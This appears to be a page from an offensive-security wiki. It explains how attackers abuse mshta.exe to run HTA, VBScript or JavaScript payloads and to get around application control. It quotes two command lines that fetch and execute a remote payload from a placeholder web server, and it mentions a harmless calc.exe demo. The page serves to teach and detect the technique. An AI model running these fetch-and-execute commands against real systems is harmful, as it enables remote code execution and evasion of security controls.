MSHTA

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Mshta.exe is a utility that executes Microsoft HTML Application (HTA)files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script:mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Example

I wrote a simple Python Script which will create easy HTA applications that will execute a simple PowerShell command this one was slightly edited to execute calc.exe

The following Demo demonstrates the execution and Process Explorer running for seeing the flow of execution, with the result of opening calc.exe

Demo-HTA:

PreviousInstallUtil NextMSIEXEC

Last updated 3 years ago